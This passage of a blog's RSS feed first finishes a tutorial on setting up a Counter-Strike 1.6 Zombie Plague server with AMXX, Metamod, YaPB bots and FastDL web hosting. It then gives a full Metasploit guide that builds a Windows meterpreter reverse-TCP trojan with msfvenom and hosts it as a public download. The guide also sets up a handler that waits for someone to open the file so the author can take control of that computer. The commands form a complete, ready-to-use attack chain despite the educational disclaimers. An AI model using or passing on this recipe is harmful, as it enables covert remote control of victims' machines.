   To leave the server running in the background while you exit the terminal, press `Ctrl+A` followed by `Ctrl+D`. This will detach the screen session without stopping the server.

   If you want to return to the server console at any time, use the following command:

   ```shell
   screen -r hlds
   ```

With your server up and running, you&apos;ve accomplished a major part of the setup process. In the next steps, we&apos;ll dive deeper into configuring your server and adding plugins to make it the ultimate CS 1.6 Zombie Plague experience!

## Step 8: Download Required Files for AMXXModX and Metamod

To enhance your CS 1.6 server with additional features and functionalities, you&apos;ll need to install AMXXModX (Advanced Multi-Mod X) and Metamod. These plugins will allow you to create and add custom game modes, plugins, and more. Let&apos;s get started by downloading the necessary files

&gt;Notes: Just follow me here, because AMXX are almost never updated. As for the explanation... it&apos;s a pity because no one plays 1.6, and the most stable version is 1.82...

1. **Download AMXXModX Base Files**:

   Use the `wget` command to download the base files of AMXXModX version 1.8.2:

   ```shell
   wget https://www.amxmodx.org/release/amxmodx-1.8.2-base-linux.tar.gz
   ```

2. **Download AMXXModX Addon Files**:

   Similarly, download the addon files for AMXXModX version 1.8.2. This step is important for CS 1.6 servers as it provides compatibility with Counter-Strike:

   ```shell
   wget https://www.amxmodx.org/release/amxmodx-1.8.2-cstrike-linux.tar.gz
   ```

3. **Download Metamod Files**:

   Next, let&apos;s download Metamod version 1.21.1, which acts as a plugin management system for Half-Life mods like AMXXModX:

   ```shell
   wget https://www.amxmodx.org/release/metamod-1.21.1-am.zip
   ```

## Step 9: Extract and Install AMXXModX and Metamod Files

Now that you have downloaded the necessary files for AMXXModX and Metamod, let&apos;s proceed to extract and install them. Follow these steps carefully to ensure a successful installation:

&gt;Attention: Please note here that the order of decompression is `base` &gt; `addon` &gt; `metamod`. &lt;br/&gt;metamod - You can not shuffle the order, but the base must be passed through the addon first

1. **Extract AMXXModX Base Files**:

   First, extract the base files of AMXXModX using the following command:

   ```shell
   tar zxvf amxmodx-1.8.2-base-linux.tar.gz
   ```

2. **Extract AMXXModX Addon Files**:

   Next, extract the addon files for AMXXModX that are specific to Counter-Strike using the command:

   ```shell
   tar zxvf amxmodx-1.8.2-cstrike-linux.tar.gz
   ```

3. **Extract Metamod Files**:

   Unzip the Metamod files using the command:

   ```shell
   unzip metamod-1.21.1-am.zip
   ```

4. **Install AMXXModX**:

   After extracting the files, navigate to the AMXXModX `addons` directory that was created. Use the `cp` command to copy the extracted `addons` directory into the appropriate location for your CS 1.6 server:

   ```shell
   cp -r addons/ ~/.steam/steamapps/common/Half-Life/cstrike/
   ```

## Step 10: Edit and Create Configuration Files

Now, these steps to make the necessary changes and create new configuration files:

1. **Modify liblist.gam**:

   The `liblist.gam` file contains crucial information about the game&apos;s libraries. Open the file using the `nano` text editor:

   ```shell
   nano ~/.steam/steamapps/common/Half-Life/cstrike/liblist.gam
   ```

   Inside the file, locate the line that starts with `gamedll_linux` and change it to:

   ```shell
   gamedll_linux `addons/metamod/dlls/metamod.so`
   ```

   After making the change, press `Ctrl + S` to save and then `Ctrl + X` to exit the `nano` editor.

2. **Create plugins.ini**:

   Next, create a new configuration file called `plugins.ini` under the `addons/metamod` directory:

   ```shell
   nano ~/.steam/steamapps/common/Half-Life/cstrike/addons/metamod/plugins.ini
   ```

   In the newly created file, add the following line:

   ```shell
   linux addons/amxmodx/dlls/amxmodx_mm_i386.so
   ```

   Once again, press `Ctrl + S` to save and then `Ctrl + X` to exit the `nano` editor.

## Step 11: Testing Your Server (AMXX Installation Verification)

Before proceeding to the next step of installing Zombie Plague, let&apos;s ensure that your game server is up and running with AMXX installed correctly.

1. Restart Your Server:
   Restart your game server using the `screen` command:

   ```shell
   screen -r hlds
   ```

   Press Ctrl+C to turn it off.

2. Start the Server:
   Navigate to the server directory:

   ```shell
   cd ~/.steam/steamapps/common/Half-Life/
   ```

   Initiate the server with the following command:

   ```shell
   screen -dmS hlds ./hlds_run -game cstrike +map de_dust2 -port 27015 +maxplayers 32 -insecure
   ```

3. Verify AMXX and Metamod:
   Access the server console:

   ```shell
   screen -r hlds
   ```

   Type the following commands to see if the plugins are properly loaded:

   ```shell
   meta list # Should be listing 3 plugins
   amxx list # Sould be listing 21 plugins
   ```

   If the results display a list of plugins, you&apos;re on the right track.

## Step 12: Installing the Zombie Plague Mod

Prepare to infuse the Zombie Plague mod into your CS 1.6 server. Follow these steps meticulously for a seamless installation:

1. **Obtaining the Zombie Plague Mod:**

   Introduce the captivating zombie apocalypse gameplay of Zombie Plague to CS 1.6. Obtain the necessary mod files from the following links:

   - [Zombie Plague 2014 Version](https://forums.alliedmods.net/showthread.php?s=d63394212992e827c6577de504a895bc&amp;t=164926) (Download the SMA files from here)
   - [Zombie Plague 2008 Version](https://forums.alliedmods.net/showthread.php?s=d63394212992e827c6577de504a895bc&amp;t=72505) (Download the resource files from here)

2. **Downloading the Files:**

   Download the mod files directly to your server using the `wget` command. Execute these commands to fetch the essential resources and plugins:

   ```shell
   wget `https://forums.alliedmods.net/attachment.php?attachmentid=136034&amp;d=1412085945` -O zp_resources.zip
   wget `https://forums.alliedmods.net/attachment.php?s=46bcb4236bef6c971e41f8e763a94c24&amp;attachmentid=28817&amp;d=1216059497` -O zp_plugins.zip
   ```

   These commands retrieve the required files and save them as `zp_resources.zip` and `zp_plugins.zip`.

3. **Unzipping the Files:**

   Create a dedicated folder for extracted files to keep things organized:

   ```shell
   mkdir zp_files
   ```

   Unzip the downloaded files into this new folder using the verbose mode for more detailed output:

   ```shell
   cd zp_files
   unzip -v ../zp_resources.zip
   unzip -v ../zp_plugins.zip
   ```

   This ensures that all files are properly extracted while providing additional information about the extraction process.

4. **Copying Files to the `cstrike/` Directory:**

   Transfer all the extracted files to the `cstrike` directory, where your CS 1.6 server files are located:

   ```shell
   cp -rv * ~/.steam/steamapps/common/Half-Life/cstrike/
   ```

   This command copies all files and directories from the `zp_files` folder to the `cstrike` directory.

5. **Compiling SMA Files:**

   Move to the scripting directory for AMX Mod X:

   ```shell
   cd ~/.steam/steamapps/common/Half-Life/cstrike/addons/amxmodx/scripting
   ```

   This directory houses the scripts for plugins.

   Compile the scripts using the provided compilation script:

   ```shell
   ./compile.sh
   ```

   This command compiles the scripts into executable plugin files.

6. **Copying Compiled Plugin Files:**

   After compiling the scripts, navigate to the `compiled` directory, This is where the compiled plugin files are stored:

   ```shell
   cd compiled
   ```

   Copy the compiled AMXX files to the plugins directory:

   ```shell
   cp -v *.amxx ../../plugins/
   ```

   This command moves the compiled plugin files from the `compiled` directory to the correct location within the `plugins` directory, allowing AMX Mod X to properly load and utilize them.

## Step 13: Testing your Server (Zombie Plague Installation Verification)

Now that you&apos;ve successfully installed the Zombie Plague mod on your CS 1.6 server, it&apos;s time to verify the installation and ensure that everything is working as expected.

1. **Restart Your Server:**
   Begin by restarting your CS 1.6 server using the `screen` command. This step ensures that any previous server instances are closed and prepares the environment for the Zombie Plague mod.

   ```shell
   screen -r hlds
   ```

   If the server is currently running, press Ctrl+C to halt it.

2. **Start the Server with Zombie Plague Mod:**
   To enable the Zombie Plague mod on your server, navigate to the server directory using the following command:

   ```shell
   cd ~/.steam/steamapps/common/Half-Life/
   ```

   Now, initiate the server with the Zombie Plague mod activated by executing the following command:

   ```shell
   screen -dmS hlds ./hlds_run -game cstrike +map de_dust2 -port 27015 +maxplayers 32 -insecure
   ```

   To access the server console and monitor its activity, use the command:

   ```shell
   screen -r hlds
   ```

   If you wish to temporarily exit the screen session without stopping the server, press Ctrl+A and then press D.

3. **Check if Zombie Plague Mod is Active:**
   Return to the screen session where your server is running:

   ```shell
   screen -r hlds
   ```

   Confirm that the Zombie Plague mod has been successfully integrated into the server by using the following command:

   ```shell
   amxx list
   ```

   This command displays a list of loaded plugins, including Zombie Plague if it&apos;s properly configured. Verify that Zombie Plague is among the listed plugins, indicating its successful installation.

4. **Join Your Zombie Plague Server:**
   It&apos;s time to experience the thrill of the Zombie Plague gameplay mode you&apos;ve just installed. Launch Counter-Strike 1.6 and access the game&apos;s console by pressing the backtick (`) key.

   **Way1: Command-line:** To join your Zombie Plague server, type the following command in the console, replacing `your_server_ip` with your server&apos;s IP address and `port` with the configured port number:

   ```shell
   connect your_server_ip:port
   ```

   **Way2: Gui:** Alternatively, you can utilize the GUI method to connect by adding your server&apos;s IP to the server list within the game interface.

   When you successfully join the server, you should be greeted with a gameplay experience similar to the following image:

   ![Zombie Plague Gameplay](./zombie_plague_gameplay.png)

## Step 14: Adding Yapb Bot to Your Zombie Plague Server

Congratulations on successfully installing Zombie Plague on your server! However, playing alone on your server might not be as exciting as having other players. In this final step, we&apos;ll show you how to add Yapb bot to your Zombie Plague server using the bot&apos;s source code.

1. **Install Required Packages:**
   First, navigate to your home directory and install the necessary packages:

   ```shell
   cd ~
   sudo apt update
   sudo apt install build-essential git clang python3 gcc-multilib g++-multilib meson ninja
   ```

   These packages provide the tools and libraries needed to compile and configure the Yapb bot.

2. **Clone the Yapb Repository:**
   Clone the Yapb bot&apos;s repository, including its submodules:

   ```shell
   git clone --recursive https://github.com/yapb/yapb
   ```

3. **Navigate to the Yapb Directory:**
   Move into the Yapb bot&apos;s directory:

   ```shell
   cd yapb
   ```

4. **Configure the Project Using Meson:**
   Set up the project configuration using Meson:

   ```shell
   meson setup build
   ```

5. **Compile the .so Library:**
   Compile the bot&apos;s .so library:

   ```shell
   meson compile -C build
   ```

6. **Copy Compiled Files to addons/yapb/bin/:**
   Copy the compiled `yapb.so` library to the `addons/yapb/bin/` directory:

   ```shell
   mkdir -pv ~/.steam/steamapps/common/Half-Life/cstrike/addons/yapb/bin/
   cp -v build/yapb/yapb.so ~/.steam/steamapps/common/Half-Life/cstrike/addons/yapb/bin/
   ```

7. **Modify plugins.ini:**
   Open the `plugins.ini` file using a text editor:

   ```shell
   nano ~/.steam/steamapps/common/Half-Life/cstrike/addons/metamod/plugins.ini
   ```

   Append the following entry to the file:

   ```shell
   linux addons/yapb/bin/yapb.so
   ```

8. **Save and Apply Changes:**
   Save the changes you made to the `plugins.ini` file. This entry ensures that the Yapb bot will be loaded and integrated into your Zombie Plague server when it starts.

## HTTP Download vs. Server Download: Which Is Faster?

When setting up FastDL for your Counter-Strike 1.6 server, you have the option to allow players to download directly from an HTTP source or from your game server. It&apos;s important to consider the speed and efficiency of these methods.

**HTTP Download:**

   - FastDL resources accessed via HTTP URLs are typically faster for players to download. Players connect to the FastDL server directly, which can result in quicker download times, especially for large files like maps and custom sounds.

**Server Download:**

   - When custom content is downloaded directly from your game server, it might take longer, especially if multiple players are simultaneously connecting and downloading resources. This method can lead to slower download speeds and potential delays for players.

To ensure the best gaming experience for your players, it&apos;s recommended to set up FastDL with HTTP download support. This way, your custom content will be readily available for players to download at optimal speeds.

## Installing a Web Server for FastDL

To host your FastDL resources via HTTP, you&apos;ll need a web server. You can choose between popular options like Apache or Nginx. Here&apos;s how to install them

&gt; Notes: Just choice one for your http server. If you want to be more customizable later on, I recommend using nginx.

**Installing Apache:**

1. Open your terminal.

2. Run the following command to install Apache:

   ```shell
   sudo apt-get install apache2 -y
   ```

3. **Enabling Apache Service:** After installing Apache, you&apos;ll need to enable and start the service. Use the following commands:

   ```shell
   sudo systemctl enable apache2   # Enable Apache service to start on boot
   sudo systemctl start apache2    # Start Apache service
   ```

4. Once installed, Apache&apos;s server files are located in the `/var/www/html/` directory.

**Installing Nginx:**

1. Open your terminal.

2. Run the following command to install Nginx:

   ```shell
   sudo apt-get install nginx -y
   ```

3. **Enabling Nginx Service:** Similarly, for Nginx, you&apos;ll need to enable and start the service:

```shell
sudo systemctl enable nginx   # Enable Nginx service to start on boot
sudo systemctl start nginx    # Start Nginx service
```

4. Once installed, Nginx&apos;s server files are also located in the `/var/www/html/` directory.

Enabling the service ensures that your web server will automatically start when your system boots up, making your FastDL resources accessible to players connecting to your Counter-Strike 1.6 server.

## Configuring Your Server for FastDL

To enable FastDL on your Counter-Strike 1.6 server, you&apos;ll need to configure the `server.cfg` file. Here are the steps:

1. Locate your `server.cfg` file. You can usually find it in the following directory:
   ```shell
   ~/.steam/steamapps/common/Half-Life/cstrike/server.cfg
   ```

2. Open `server.cfg` using a text editor of your choice.

3. Add the following line to the file, replacing ``http://your-fastdl-server.com/`` with the actual URL to your FastDL server directory:

   ```shell
   sv_downloadurl `http://your-fastdl-server.com/`
   ```

   This line tells your Counter-Strike 1.6 server to use the specified URL for downloading custom content.

4. Save the changes to the `server.cfg` file.

5. Put all your resource files in /var/html/www/. Be sure to match the location, otherwise it will not be downloaded.

6. Restart your server.

Now, when players connect to your Counter-Strike 1.6 server, the game will automatically fetch custom content from your FastDL server, enhancing their gaming experience.

### Additionally

you can access your FastDL server&apos;s files via a web browser using the following format:

   ```shell
   http://your-fastdl-server.com/
   ```

   This URL will allow you to manage and organize your FastDL resources for your server.

## **Important Note for Counter-Strike 1.6 Server Owners**

If you&apos;re a Counter-Strike 1.6 server owner considering the use of a custom domain through Cloudflare, there&apos;s a crucial aspect to keep in mind. Counter-Strike 1.6 does not support HTTPS (TLS) connections, which is essential to understand when working with custom domains and Cloudflare.

Here&apos;s what you need to know:

**1. HTTPS (TLS) Not Supported:** Counter-Strike 1.6 relies on plain HTTP connections, not HTTPS (TLS). This means that when players connect to your server, it happens over an unencrypted HTTP connection.

**2. Cloudflare&apos;s Proxy Service:** Cloudflare provides a proxy service that, by default, routes traffic through its servers. This can enable HTTPS for your domain, but it also means that all traffic is converted to HTTPS.

**3. Non-Proxy (DNS Only) Status:** To ensure that players can connect to your Counter-Strike 1.6 server, you must set the custom domain to `DNS Only` status in Cloudflare. This configuration will route the traffic directly to your server without going through Cloudflare&apos;s proxy servers. This is crucial because, as mentioned, CS 1.6 doesn&apos;t support HTTPS, and forcing HTTPS through Cloudflare will result in connection issues.

**4. Maintaining Server Connectivity:** By setting your custom domain to `DNS Only` status in Cloudflare, you ensure that players can connect to your Counter-Strike 1.6 server without any encryption-related problems. This maintains the compatibility required for a seamless gaming experience.

It&apos;s essential to follow these steps to guarantee that your custom domain and Cloudflare setup don&apos;t interfere with the connectivity of your Counter-Strike 1.6 server. By prioritizing non-proxy (DNS only) status, you&apos;ll ensure that players can effortlessly join your server without encountering any obstacles related to HTTPS compatibility.

### DNS Record Configuration for Your Domain

When configuring the DNS record for your domain in Cloudflare, it&apos;s crucial to set it to `DNS Only.` This ensures that your domain does not go through Cloudflare&apos;s proxy service, allowing you to maintain compatibility with services like Counter-Strike 1.6 that rely on plain HTTP connections.

**DNS Only (No Proxy):** For your domain&apos;s DNS record, select the option that specifies `DNS Only` or `No Proxy.` This configuration ensures that traffic to your domain goes directly to your server without being routed through Cloudflare&apos;s proxy servers.

While your DNS record remains `DNS Only,` you can still use HTTPS within your HTTP server for secure connections. This means that when someone accesses your website using HTTPS in their browser, your server can deliver content securely over HTTPS. However, it&apos;s important to note that your game server, like Counter-Strike 1.6, will continue to use HTTP for resource downloads.

By configuring your DNS record in this way, you strike a balance between maintaining compatibility with older services like Counter-Strike 1.6 and providing secure HTTPS access to your website for modern browsers. This setup allows you to ensure smooth connectivity for all users while keeping your resources accessible via HTTP for older systems.

## Conclusion

Congratulations! You&apos;ve successfully transformed your Counter-Strike 1.6 server into an exciting Zombie Plague server complete with AI-controlled Yapb bots, Also using fastdl for HTTP download your server resources.

Now, you can access your server with your custom domain, such as `cs.yourserver.io` or `download.yourserver.io.` Happy gaming!

## References

- [SteamCMD](https://developer.valvesoftware.com/wiki/SteamCMD#Debian-Based_Distributions_.28Ubuntu.2C_Mint.2C_etc..29)
- [Zombie Plague Mod 5.0](https://forums.alliedmods.net/showthread.php?s=d63394212992e827c6577de504a895bc&amp;t=72505)
- [ZP 5.0 Betas/Updates](https://forums.alliedmods.net/showthread.php?s=d63394212992e827c6577de504a895bc&amp;t=164926)
- [Official YaPB Documentation](https://yapb.readthedocs.io/en/latest/building.html)
- [Github - YaPB](https://github.com/yapb/yapb)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Creating a Trojan Backdoor with Reverse TCP Payload in Metasploit and Setting Up World-wide Access for Windows Machines</title><link>https://ummit.dev//posts/infosec/metasploit/reverse_tcp-shell-metasploit-trojan/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/metasploit/reverse_tcp-shell-metasploit-trojan/</guid><description>Educational guide to creating reverse TCP backdoors with Metasploit framework for security testing and penetration analysis.</description><pubDate>Sun, 27 Jun 2021 00:00:00 GMT</pubDate><content:encoded>## Introduction

Metasploit was pertty much a tool for testing exploits and vulnerabilities, but it can also be used to create backdoors and trojans. In this guide, we will create a trojan backdoor with a remote code execution (RCE) payload in Metasploit. We will also set up world-wide access to the backdoor program.

## Disclaimer

***This article is for educational purposes only. Please use this knowledge responsibly. Unauthorized access to systems is illegal and unethical. The methods here are used for legitimate recovery and testing, not for illegal activities.***

## Prerequisites

A brain and a computer. You bashould have a understanding of how to use the command line and Metasploit. ***Again, this guide is for educational purposes only. Scipt kiddies, please don&apos;t use this for illegal activities lmao.***

## Install Required Packages

Download and install the packages that optimize our process and make it easier to set up the server.

```
sudo apt update
sudo apt install curl ufw screen apache2 metasploit-framework --yes
```

## Setting Up World-wide Access

We will use `ufw` to set up the firewall. `ufw` is disabled by default, so we need to enable it. It will warn you that connections may be dropped, but you can ignore this and continue by typing `y`.

Enable `ufw`:
```bash
sudo ufw enable
```

### Allow Specific Ports

Using TCP Protocol, we will demonstrate with port 5555:

```bash
sudo ufw allow 5555/tcp
```

### Check Current IP Address

To generate the trojan, we need to know the current host&apos;s IP address. Use the following command to check:
```bash
curl ifconfig.me
```

Alternatively, use `hostname` to check:

```bash
hostname -i
```

Copy the IP address and proceed to the next step.

## Generate the Backdoor Program

We will use Metasploit&apos;s built-in program `msfvenom`.

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=5555 -f exe &gt; trojan.exe
```

- `LHOST`: Your Public IP Address
- `LPORT`: The port number you opened
- `trojan.exe`: The name of the generated file

## Create Download Link

To allow users to access your website and download the file, you can set up Apache or nginx, or use a simple Python server. To make our file management by yourself to ensure the file is not tampered with other web servers. So better to self-host the file :D

First, allow port 80:

```bash
sudo ufw allow 80
```

### Copy the Backdoor Program to the Web Server

use the `cp` command to copy the generated backdoor program to your web server. The web server path is:

```bash
/var/www/html
```

Copy the file to the directory:

```bash
cp -v trojan.exe /var/www/html/
```

Open a browser and enter your server&apos;s IP address to access the website. The successful page bashould look like this:

## Downlaod the File

Use a browser to enter your IP address and the file name to test the download. The successful page bashould look like this:

```
123.123.123.123/trojan.exe
```

## Metasploit Listener

After confirming the file can be downloaded, we need to use the `msfconsole` to set up the listener.

Open Metasploit:

```bash
msfconsole
```

### Use the Specified Module

Enter the following commands to create our listener of reverse TCP:

```bash
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
```

### Set Payload Options

In the console, the program does not yet know the information about your backdoor program. We need to modify the configuration to let the console know where the exploit is.

Show current options:

```sh
show options
```

You will see two options that need to be modified: `LHOST` and `LPORT`. Set them to your public IP and the TCP port you opened.

Set the IP address:

```sh
set LHOST [IPV4_Address]
```

Set the port number:

```sh
set LPORT [Port_Number]
```

### Verify the Settings

Check the current settings:

```sh
show options
```

### Wait for the Backdoor Program to be Opened

Once everything is set, you can start listening for someone to open your backdoor program. When someone opens the file, your console will respond, and you will have successfully compromised the computer.

There are a few methods to start listening:

#### Method 1: `exploit`

This method does not allow you to work in the same window while waiting. You can stop the process by pressing `Ctrl+C`.

Start listening:

```sh
exploit
```

#### Method 2: `run`

This method allows you to continue working in the same window while waiting. You can stop the process by pressing `Ctrl+C`.

Start listening:

```sh
run
```

#### Method 3: `exploit -j -z`

This method allows you to continue working in the same window, but you need to manually enter the session.

Start listening:

```sh
exploit -j -z
```

When the target opens the file, your console will respond. You need to enter the session to control the system.

First, check the current sessions:

```sh
sessions
```

You will see an ID, for example, `1`. Use the `-i` option to enter the session:

```sh
sessions -i 1
```

## Conclusion

You have successfully created a trojan backdoor with a remote code execution payload in Metasploit. You can now access the target system and control it remotely. Remember to use this knowledge responsibly and legally. Unauthorized access to systems is illegal and unethical. The methods here are used for legitimate recovery and testing, not for illegal activities. Have fun hacking :)

### Do We Need to Learn Metasploit?

My answer is: it can be yes or no.

Metasploit is essentially a command-line interface (CLI) tool for testing exploits and vulnerabilities. However, if you are targeting a bug bounty program or working as a red team professional, Metasploit shoule be quite simple for you to use. Learning Metasploit is beneficial, but it is even more valuable to spend time learning how to write your own exploits and understand the underlying exploit code. Relying solely on pre-made tools like Metasploit may not be the best approach.

For example, understanding OWASP&apos;s Top 10 vulnerabilities, such as SQL injection (including error-based, UNION-based, and blind SQL injection), is crucial. It is better to invest time in learning these concepts rather than just using existing tools. This deeper understanding will make you a more effective and versatile security professional.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item></channel></rss>